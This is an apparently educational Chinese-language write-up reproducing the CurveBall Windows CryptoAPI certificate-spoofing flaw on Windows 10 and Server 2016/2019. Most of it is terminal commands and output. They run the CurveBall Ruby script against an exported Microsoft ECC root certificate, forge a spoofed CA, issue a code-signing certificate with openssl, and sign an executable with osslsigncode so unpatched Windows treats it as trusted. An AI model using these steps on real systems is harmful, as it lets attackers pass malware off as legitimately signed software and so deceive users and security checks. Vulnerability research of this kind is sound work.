影響版本:
Windows 10
Windows Server 2016/2019
依賴於Windows CryptoAPI的應用程序
查看win證書
查看一下本地windows證書,win+r輸入certmgr.msc
這裏可以看到系統默認的ECC簽名根證書,隨便找一個導出:
雙擊證書可以看到證書的詳細信息:
復現:
//安裝 rudy
a@a-virtual-machine:~$ sudo apt install ruby
//若提示進程被佔用解決方法
//ps -A | grep apt 列出使用的進程
//sudo kill -9 進程號 殺死進程
//生成spoofed_ca.key公鑰文件
a@a-virtual-machine:~/CurveBall-master$ ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
//生成spoofed_ca.crt公鑰文件
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
Can't load /home/a/.rnd into RNG
140535782355392:error:2406F079:random number generator:RAND_load_file:Cannot open file:../crypto/rand/randfile.c:88:Filename=/home/a/.rnd
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:aa
State or Province Name (full name) [Some-State]:aa
Locality Name (eg, city) []:aa
Organization Name (eg, company) [Internet Widgits Pty Ltd]:aa
Organizational Unit Name (eg, section) []:aa
Common Name (e.g. server FQDN or YOUR name) []:aa
Email Address []:aa '
//生成cert.key密鑰文件
a@a-virtual-machine:~/CurveBall-master$ openssl ecparam -name secp384r1 -genkey -noout -out cert.key
//生成cert.csr文件
a@a-virtual-machine:~/CurveBall-master$ openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs
//生成cert.crt簽名證書
a@a-virtual-machine:~/CurveBall-master$ openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs
Signature ok
subject=C = DK, ST = Denmark, L = Copenhagen, O = ollypwn, CN = ollypwn
Getting CA Private Key
//生成cert.p12證書文件
a@a-virtual-machine:~/CurveBall-master$ openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed_ca.crt -name "Code Signing" -out cert.p12
Enter Export Password:
Verifying - Enter Export Password:
生成python_signed.exe簽名可執行文件
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in python.exe -out python_signed.exe
Command 'osslsigncode' not found, but can be installed with:
sudo apt install osslsigncode
a@a-virtual-machine:~/CurveBall-master$ sudo apt install osslsigncode
[sudo] a 的密碼:
正在讀取軟件包列表... 完成
a@a-virtual-machine:~/CurveBall-master$ osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out python_signed.exe
Succeeded
參考文獻:
https://github.com/ollypwn/CurveBall
https://blog.csdn.net/Eastmount/article/details/104335673